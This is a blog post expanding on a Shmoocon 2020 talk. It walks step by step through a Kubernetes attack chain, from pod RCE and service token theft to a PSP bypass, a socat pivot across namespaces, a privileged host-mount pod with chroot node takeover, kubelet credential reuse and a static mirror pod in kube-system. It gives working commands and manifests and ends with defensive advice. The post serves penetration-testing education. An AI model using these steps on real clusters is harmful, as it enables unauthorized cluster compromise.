On Saturday, February 1st, I gave my talk titled “Command and KubeCTL: Real-World Kubernetes Security for Pentesters” at Shmoocon 2020. I’m following up with this post, which goes into more detail than I could cover in 50 minutes. It will reiterate the points I attempted to make, walk through the demo, and provide resources for more information.

Before diving into the details, here are some resources:

Premise

This talk was designed to be a Kubernetes security talk for people doing offensive security or looking at Kubernetes security from the perspective of an attacker. This was a demo-focused talk, where much of the talk was one long demo showing an attack chain.

My goal for the talk was to demonstrate something complicated and not simple to exploit, like in the real world. I wanted things to fail at first so that you had to figure out ways around them, and I wanted the threat model to dictate the impact of each threat.

A few of the most important points from my talk were:

- The threats are what you make them: The Kubernetes threat model is often up for interpretation by the deployer. In the presentation I gave examples of 3 completely differently configured environments that have different security expectations. These were based on very common issues that we’ve identified while performing security reviews at NCC Group. Each has a different threat model, and each has a different business impact. While it’s not a popular topic to share at a hacker con, I think it’s important to factor in business impact and threat modeling along with the “hacking.” Sometimes organizations will choose to look at your awesome hack and accept the risk, and that’s ok.

- New tech, same security story: Kubernetes is that new technology getting deployed faster than it’s getting secured. Virtualization had a similar arc as an isolation technology that was sometimes leveraged prematurely in its early stages. Eventually it matured, and containers and Kubernetes could follow a similar path. If the security industry wants to help the cause, we might need to update our tactics and tools.

- Real world demos for k8s should be non-linear: In my talk, I demoed a real world(ish) attack chain that has a lot of steps to overcome. I wanted to show that it’s not just a single vulnerability that knocks the cluster over. There are things that need to be bypassed and subtle problems that come up, which together are more impactful (and exploitable) than we’d expect from their individual parts.

For the rest of my post, I will be covering the details of the third case study I presented on.

There have been talks on Kubernetes security before. Ian Coldwater and Duffie Cooley @ Black Hat laid the groundwork on how we shouldn’t assume K8s is secure. Tim Allclair and Greg Castle @ KubeCon 2019 dove deeper into compromising actual workloads and the issues with trying to segregate nodes. Brad Geesaman @ KubeCon 2017 talked about some of the ways to attack clusters. Just to name a few.

Demo Attack chain



The demo from the talk took the third company (which I randomly named eKlowd) and used it as an example organization that is trying to do per-namespace multi-tenancy. In short, the attack chain looks like this:

- Pod compromise

- Namespace compromise

- Namespace tenant bypass

- Node compromise

- Cluster compromise

1.0 RCE into the Pod

Each of the case studies in the talk was meant to show what happens after you compromise a Pod, so the demo starts by finding a web service with an RCE in it and using that to take over the Pod. This was simply a Flask web application I wrote that allowed you to execute any command with a URL argument like /?cmd=cat /etc/shadow.
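A small helper for driving this kind of endpoint from a laptop might look like the sketch below. It assumes the service takes the command in a cmd query parameter as described above; the TARGET address and the rce function name are hypothetical placeholders, not part of the original demo.

```shell
#!/bin/sh
# Hypothetical target: replace with the address of the exposed web service.
TARGET="${TARGET:-http://203.0.113.10:5000}"

# rce CMD: send CMD to the vulnerable endpoint as the "cmd" query parameter.
# -G turns the --data-urlencode payload into a URL query string, so spaces
# and slashes in the command are percent-encoded by curl.
rce() {
    curl -sS -G --data-urlencode "cmd=$1" "$TARGET/"
}

# Example (not run here): rce 'cat /etc/shadow'
```

Letting curl do the encoding avoids hand-escaping commands that contain spaces or special characters.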

1.1 Steal Service Tokens

Using the RCE to read the Service Token from its default path is an extremely common first step. However, I designed the exploited Pod to not run as root, which meant that by default the Service Token wasn’t readable by that user. So I used the fsGroup feature, which changes the group ownership of the service token to the group I specified. I think this matches what we’d see in the real world, but I used it mostly to speed up taking over the token.
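As a rough sketch of this step, the function below reads the files that Kubernetes mounts for the Service Account at the default path. The sa_read name and the SA_DIR override are illustrative assumptions; inside a real Pod the default directory would normally be used as-is.

```shell
#!/bin/sh
# Default mount point for the Service Account files inside a Pod.
# SA_DIR can be overridden, which is handy when testing outside a cluster.
SA_DIR="${SA_DIR:-/var/run/secrets/kubernetes.io/serviceaccount}"

# sa_read NAME: print one of the mounted files (token, namespace, or ca.crt).
sa_read() {
    if [ -r "$SA_DIR/$1" ]; then
        cat "$SA_DIR/$1"
    else
        echo "cannot read $SA_DIR/$1 (check file ownership and fsGroup)" >&2
        return 1
    fi
}

# Example (not run here):
#   TOKEN="$(sa_read token)"; NAMESPACE="$(sa_read namespace)"
```

If the read fails for a non-root user, that is the situation described above where file ownership (and therefore fsGroup) decides whether the token is reachable.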

1.2 Find the public IP of the cluster

I created a role in the cluster to expose the Endpoints API so that I could make it easier for the demo. That’s because GKE, with a load balancer, will have a different IP for the Kubernetes API and the exposed service I created, and I needed both. I think doing it this way is slightly better than sneaking over to my gcloud console and requesting the IP with my cluster-admin account. In the real world, you might not even have this problem if there’s a shared IP or it was exposed in a different manner. Also, in a more real world scenario, you may just decide not to access the API remotely at all and try to do everything from within a compromised Pod. In that case, you’d simply need the private IP of the Kubernetes cluster, which can be found as an environment variable.
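For the in-Pod case, a minimal sketch of building the API address from the environment might look like this. KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT are the variables Kubernetes injects for the kubernetes Service; the api_server_url function name is made up for illustration.

```shell
#!/bin/sh
# api_server_url: build the in-cluster API address from the environment
# variables Kubernetes injects into Pods for the "kubernetes" Service.
api_server_url() {
    if [ -z "${KUBERNETES_SERVICE_HOST:-}" ]; then
        echo "KUBERNETES_SERVICE_HOST is not set; probably not inside a Pod" >&2
        return 1
    fi
    printf 'https://%s:%s\n' "$KUBERNETES_SERVICE_HOST" "${KUBERNETES_SERVICE_PORT:-443}"
}
```

Through an RCE like the one in this demo, running env and looking for the KUBERNETES_ variables gives the same information.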

1.3 Setup kubectl with the compromised token

I wrote a script to speed up the process of configuring kubectl, which simply made a kubeconfig file that used the stolen Service Token. Mostly I wanted to make sure I wasn’t accidentally using the default, auto-updating gcloud kubeconfig file or one of the other cluster contexts that my default kubeconfig file had access to. I’ve found that relying on the default kubeconfig file often creates bugs when trying to build a proof-of-concept attack, so I use the KUBECONFIG environment variable to point to a local file instead.
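The script from the talk is not reproduced here, but a sketch of the same idea, assuming a bearer token and the cluster CA file have already been copied out of the Pod, could look like the following. The write_kubeconfig function and the names target and stolen-sa are arbitrary choices for illustration.

```shell
#!/bin/sh
# write_kubeconfig FILE SERVER TOKEN CA_FILE NAMESPACE
# Writes a standalone kubeconfig that authenticates with a bearer token.
# The cluster, user, and context names ("target", "stolen-sa") are arbitrary.
write_kubeconfig() {
    cat > "$1" <<EOF
apiVersion: v1
kind: Config
clusters:
- name: target
  cluster:
    server: $2
    certificate-authority: $4
users:
- name: stolen-sa
  user:
    token: $3
contexts:
- name: target
  context:
    cluster: target
    user: stolen-sa
    namespace: $5
current-context: target
EOF
    chmod 600 "$1"
}

# Example (not run here; all values are placeholders):
#   write_kubeconfig ./demo.kubeconfig https://203.0.113.20 "$TOKEN" ./ca.crt secure
#   export KUBECONFIG="$PWD/demo.kubeconfig"
```

Pointing KUBECONFIG at a dedicated file keeps the proof of concept isolated from whatever contexts the default kubeconfig already holds.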

1.4 Determine what you can do in the cluster

In my demo I used kubectl auth can-i --list -n secure to see what I can do in the context of the “secure” namespace, and kubectl-access-matrix -n secure, which gives much cleaner output. This step was mainly to point out that it appears as if we have full access to our namespace. Determining what you can and cannot do in the cluster is a very common stage during assessments.
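When the access-matrix plugin is not available, individual checks with kubectl auth can-i can be looped into a rough table. This is only a sketch: the can_i_matrix name and the short lists of verbs and resources are assumptions, and a real assessment would cover far more.

```shell
#!/bin/sh
# can_i_matrix NAMESPACE: ask the API server, one verb/resource pair at a
# time, whether the current credentials are allowed to perform the action.
# "kubectl auth can-i" prints yes or no for each query.
can_i_matrix() {
    for resource in pods secrets deployments; do
        for verb in get list create delete; do
            # can-i exits non-zero on "no", so ignore the exit status.
            answer="$(kubectl auth can-i "$verb" "$resource" -n "$1" 2>/dev/null)" || true
            printf '%-8s %-12s %s\n' "$verb" "$resource" "${answer:-unknown}"
        done
    done
}

# Example (not run here): can_i_matrix secure
```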

1.5 Try to deploy a Pod but get blocked.

This step showed that running kubectl run -it myshell --image=busybox -n secure fails. It demonstrated that while there’s a Role granting full control over the Namespace, something is still preventing us from starting a new Pod. This was the PSP discussed in the next step. My point again is that there can be many things in the way, and simply not being able to perform a function doesn’t mean that you’re completely blocked. In my slides, I go on to explain how a PSP is applied and how we can leverage it in the next phase.



2.0 Bypass the PSP to deploy a Pod

This was meant to demo what happens when you have a seemingly simple PSP that sets MustRunAsNonRoot but doesn’t set AllowPrivilegeEscalation=false, as shown below. The second setting is what prevents the use of a binary with the SETUID bit set, like sudo. The demo was to run a Pod as non-root, and then simply run sudo.

    apiVersion: extensions/v1beta1
    kind: PodSecurityPolicy
    metadata:
      name: restricted
    spec:
      privileged: false
      seLinux:
        rule: RunAsAny
      supplementalGroups:
        rule: RunAsAny
      runAsUser:
        # Require the container to run without root privileges.
        rule: 'MustRunAsNonRoot'
      fsGroup:
        rule: RunAsAny
      volumes:
      - '*'

2.1 Port forwarding into the Pod

I’m doing kubectl port-forward -n secure myspecialpod 8080, which connects me into the custom image I created. I tried to explain that it’s up to you whether to tool up the custom image you’ve deployed or just port-forward back out. I was doing port forwarding mostly to show that this feature exists. In any case, you’ll want to determine how to maintain persistent access. This could be port forwarding with kubectl or creating a reverse shell you can access later. You should always be aware of the ephemeral nature of the environment: Pods are often rebuilt on a regular basis and the Service Token you’ve obtained expires after a short period of time, so you’re going to need to work quickly.

2.2 Finding other services in the cluster

The next step was to find other Pods in the cluster via nmap -sS -p 5000 -n -PN -T5 --open 10.24.0.0/16 which is of course a very specific nmap command and implies I already know the service I’m looking for. In the real world, nmap -AF 10.24.0.0/16 would be a likely command you could run but I didn’t want to wait while we port scanned a /16 subnet. Even on a local network, that would be more time consuming than reasonable for the demo.
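To put the size of that scan in perspective, the arithmetic can be sketched as below. The function names are made up for illustration; the only outside fact used is that nmap’s -F option scans the 100 most common ports.

```shell
#!/bin/sh
# hosts_in_cidr PREFIX_LEN: number of IPv4 addresses in a block of that size.
hosts_in_cidr() {
    echo $(( 1 << (32 - $1) ))
}

# probes HOSTS PORTS: total host/port pairs a scan has to try.
probes() {
    echo $(( $1 * $2 ))
}

# Example:
#   hosts_in_cidr 16                          # addresses in a /16
#   probes "$(hosts_in_cidr 16)" 1            # single-port scan, as in the demo
#   probes "$(hosts_in_cidr 16)" 100          # fast scan (-F) of the same range
```

A /16 holds 65,536 addresses, so the single-port scan tries 65,536 host/port pairs while a -F scan of the same range tries 6,553,600, before any of the extra detection work that -A adds.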

2.3 Socat to the other service

This is again me attempting to get remote access into a Pod from my personal laptop. I like doing this because in a real assessment, all of my favorite tools are already on my system and if I was aiming to exploit it, I’d most likely do it this way. This runs something like:

    kubectl run -n secure --image=alpine/socat socat -- -d -d tcp-listen:9999,fork,reuseaddr tcp-connect:10.24.2.3:5000

This runs Socat in the Namespace we’ve compromised (secure) and tells it to forward to the new service we’d like to compromise (10.24.2.3:5000), regardless of which Namespace that service is in. In effect, we’ve bypassed any logical Namespace restrictions by being able to communicate from Pod to Pod.

3.0 Compromise the other Pod

My demo is showing another Pod in a different namespace (default) that just happens to have the same RCE vulnerability as the first. Of course that’s unlikely during an engagement but you can imagine 2 scenarios in the real world:

First, many people have seen services that need to be deployed into each Namespace. Tiller is often deployed this way. So you compromise one Namespace through the Tiller service and then go to a second Namespace and find the exact same service that you can compromise there. (The issues with Helm 2 were mentioned during the talk but I’m not going to go into them here.)

The second scenario is simply that you did in fact find another service and it’s not designed to be public facing because it has no authentication controls. Maybe this could be a Redis instance or some API endpoint that doesn’t need you to authenticate to it.

We’ve seen a lot of environments now that want to do namespace isolation at the network level. It’s possible but it’ll depend on what technology you use. Network Policies is likely the most Kubernetes native solution. But I see more solutions that are using Calico or Istio. There are lots of solutions including some cloud providers letting you set Pod isolation policies as native ACLs. This is a whole separate talk, I think – and we’ll also have some future posts on container networking shared on this blog soon.

3.1 Steal account token in new namespace

I’m simply stealing the Service Account token again, plugging it back into my kubeconfig file and showing that I can access a new namespace that has fewer restrictions (no PSP) than my own namespace. I now have access to the “default” namespace. This is repeating our first steps of compromising a token and seeing what we can do. The difference is that I’m no longer in the “secure” namespace that has the RBAC restrictions and PSP applied to it. In the “default” namespace, there are no restrictions and I can perform different actions.

3.2 Deploy a privileged pod

One of the restrictions that get lifted in the “default” namespace is that it allows you to run a privileged Pod. I think this is a real world scenario because we’re not seeing many groups that block this yet. We all know it’s bad to run a privileged container but there often ends up being some service that needs to be deployed privileged and the amount of effort to prevent this is way too high for organizations. This step deploys a malicious, privileged Pod into the “default” namespace. Here’s what that Pod’s YAML looks like:

    apiVersion: v1
    kind: Pod
    metadata:
      name: brick-privpod
    spec:
      # hostPID is a Pod-level field, so it sits under spec rather than inside the container.
      hostPID: true
      containers:
      - name: brick
        image: gcr.io/shmoocon-talk-hacking/brick
        volumeMounts:
        - mountPath: /chroot
          name: host
        securityContext:
          runAsUser: 999
          privileged: true
      volumes:
      - name: host
        hostPath:
          path: /
          type: Directory



4.0 Compromise the Node

With my privileged Pod I’m also sharing the host’s process namespace and doing a host volume mount. I try to explain this in the slides with some graphics. The Node’s “/” is mounted into the container’s “/chroot” directory, meaning that if you look in “/chroot” you’ll see the Node’s file system. Then simply running chroot /chroot means that I take over the Node by switching into its root file system.

4.1 Deeper compromise

The following steps are the “… profit” phase if you will. We’ve taken our compromise from a simple RCE to taking over a Node, but we still have some restrictions that are worth discussing. This may seem like the “end” because we’ve taken over a host but it’s not if we’re trying to compromise the cluster. In these steps, I’m stealing information that happens to be on the GKE node and using it to further access the cluster. Then deploying a mirror Pod.

4.2 Stealing the kubelet config

With a compromised node we can leverage some of its files to further escalate access to the rest of the cluster. First I alias kubectl to speed things up:

    alias kubectl=/home/kubernetes/bin/kubectl

which is how GKE will be configured in an “UBUNTU” image. Then I point the KUBECONFIG environment variable to a static location to use the kubelet’s config file:

    export KUBECONFIG=/var/lib/kubelet/kubeconfig

The results I’m demonstrating here are that when I run

    kubectl get po --all-namespaces

it shows me all Pods, Deployments, Services, etc. That’s another privilege escalation, as I now have full access to read the cluster. But are there still constraints on using the Kubelet’s authentication token?

4.3 Kubelet constraints:

Yes, of course there are. I show that running a command like kubectl run -it myshell --image=busybox -n kube-system will return a response saying that the kubelet does not have permission to create a Pod in that namespace. That’s because the kubelet is restricted to only perform the functions it needs and does not have the ability to create new Pods in a namespace. This is where Mirror pods or static Pods come in.

5.0 Creating mirror pods

This step is directly thanks to the presentation from Tim Allclair and Greg Castle that introduced me to Mirror pods. I’d recommend you go check out their talk for deeper detail there. In short, you can put a yaml file in the /etc/kubernetes/manifests directory with a description of a Pod, and it will be “mirrored” into the cluster. So I created a mirror Pod with my malicious Image such that it gets deployed into the “kube-system” namespace as shown below:

    apiVersion: v1
    kind: Pod
    metadata:
      name: bad-priv2
      namespace: kube-system
    spec:
      # hostPID is a Pod-level field, so it sits under spec rather than inside the container.
      hostPID: true
      containers:
      - name: bad
        image: gcr.io/shmoocon-talk-hacking/brick
        stdin: true
        tty: true
        imagePullPolicy: IfNotPresent
        volumeMounts:
        - mountPath: /chroot
          name: host
        securityContext:
          privileged: true
      volumes:
      - name: host
        hostPath:
          path: /
          type: Directory
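Placing the manifest can be sketched as a simple copy. This assumes the Node’s root is still mounted at /chroot inside the privileged Pod, so the kubelet’s manifest directory is reachable under that prefix; the drop_static_pod name and the MANIFEST_DIR override are illustrative.

```shell
#!/bin/sh
# Assumed paths: the Node's root is mounted at /chroot inside the privileged
# Pod, and the kubelet watches /etc/kubernetes/manifests for static Pods.
MANIFEST_DIR="${MANIFEST_DIR:-/chroot/etc/kubernetes/manifests}"

# drop_static_pod FILE: copy a Pod manifest into the kubelet's manifest
# directory. The kubelet picks it up on its next scan, starts the Pod, and
# registers a mirror Pod for it with the API server.
drop_static_pod() {
    if [ ! -d "$MANIFEST_DIR" ]; then
        echo "no manifest directory at $MANIFEST_DIR" >&2
        return 1
    fi
    cp "$1" "$MANIFEST_DIR/$(basename "$1")"
}

# Example (not run here): drop_static_pod ./bad-priv2.yaml
```

No API call is involved in this step, which is why the kubelet’s lack of permission to create Pods does not get in the way.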

5.1 Get the new image’s IP:

This is another privileged Pod that we should be able to shell into. I then run kubectl get po -n kube-system to confirm that the Pod has been deployed and run it again with -o yaml | grep podIP to find out what IP it currently has. I’m going to use that to remotely access it in the next step.
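As an alternative to grepping the YAML output, a JSONPath query returns just the address. The pod_ip function name and the NODE_NAME variable are placeholders for illustration.

```shell
#!/bin/sh
# pod_ip NAMESPACE POD: print only the Pod's IP using a JSONPath query.
pod_ip() {
    kubectl get pod "$2" -n "$1" -o jsonpath='{.status.podIP}'
}

# Mirror Pods are registered as <manifest name>-<node name>, so the Pod from
# the manifest above shows up with the Node's name appended. NODE_NAME is a
# placeholder here.
# Example (not run here): pod_ip kube-system "bad-priv2-$NODE_NAME"
```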

5.2 Accessing the shell in the kube-system namespace

Then I’m using the krew tool that I wrote called net-forward to run a command like this kubectl-net_forward -i 10.23.2.2 -p 8080. This creates a socat listener and a reverse proxy (just like I used earlier in the demo) into that image that I just deployed. To be honest, this step is mostly to demonstrate some of the nuances and weirdness of escalating access within the cluster. I could have taken over other Nodes by simply creating new privileged Pods over and over until they got deployed into the other Nodes I wanted.

I should also note that in my demo, I didn’t give a good reason why we were targeting the cluster itself. A real-world attacker would more likely target the workloads in the cluster than the underlying cluster infrastructure. I hope to see more talks and demos like this in the future but this talk was meant to be about Kubernetes and its various different security mechanisms that pentesters should understand.

Defenses

To defend from the specific attack chain I mentioned above, applying some of the defenses below can be useful:

- Don’t allow privileged Pods

- Don’t allow a container to become root

- Don’t allow host mounts at all

- Consider a network plugin or Network Policy for segmentation

- Only use images and registries that you trust and don’t rely on Dockerhub as a trusted source

- Keep roles and role bindings as strict as possible

- Don’t automount Service Tokens into Pods if your services don’t need to communicate to the API

- Consider abstracting direct console access to the cluster away (e.g. Terraform, Spinnaker) so that none of your developers have cluster-admin permission.
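As a starting point for the first item in the list, a defender could audit which Pods currently run privileged containers. This is a rough sketch, not a complete audit: the function names are made up, it only inspects regular containers (not init containers), and it needs credentials that can list Pods across namespaces.

```shell
#!/bin/sh
# list_pod_privilege: one line per Pod with namespace/name and the
# "privileged" flag of each container (empty when the flag is not set).
list_pod_privilege() {
    kubectl get pods --all-namespaces -o jsonpath='{range .items[*]}{.metadata.namespace}{"/"}{.metadata.name}{"\t"}{.spec.containers[*].securityContext.privileged}{"\n"}{end}'
}

# privileged_pods: keep only Pods where at least one container is privileged.
privileged_pods() {
    list_pod_privilege | awk -F '\t' '$2 ~ /true/ { print $1 }'
}

# Example (not run here): privileged_pods
```

Anything this reports is a candidate for review before a policy that blocks privileged Pods is rolled out.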

Conclusions

I showed you a cluster at a company that was completely insecure… but the company accepted the risk and didn’t make any changes.

I showed a company that was very secure for their threat model… but then pointed out that few organizations have the resources to make an environment like this.

I then showed a company that was trying to do something very complex and how compromising it required the same level of complexity.

I admit that my talk wasn’t “dropping 0days” or CVEs on Kubernetes, which are always fun and entertaining presentations. I took a less sexy path that tried to discuss more uncomfortable, nuanced attacks and defenses that I think are real-world scenarios and that factor in an organization’s threat model. I don’t think it’s about how secure Kubernetes is right now; it’s about how secure organizations expect it to be, and how pentesters can validate those expectations.

Links to Tools and Other Work

Tools:

- go-pillage-registries (via Josh Makinen @ NCC Group)

- kubectl-net-forward (mine)

- brick attack image (mine)

- conmachi (via NCC Group)

- krew

- peirates via Inguardians

- botb via brompwnie

Other Talks

- The Path Less Travelled by @IanColdwater and @Maulion

- Walls Within Walls by @tallclair and @mrgcastle

- Hacking and Hardening Kubernetes Clusters by Example by @bradgeesaman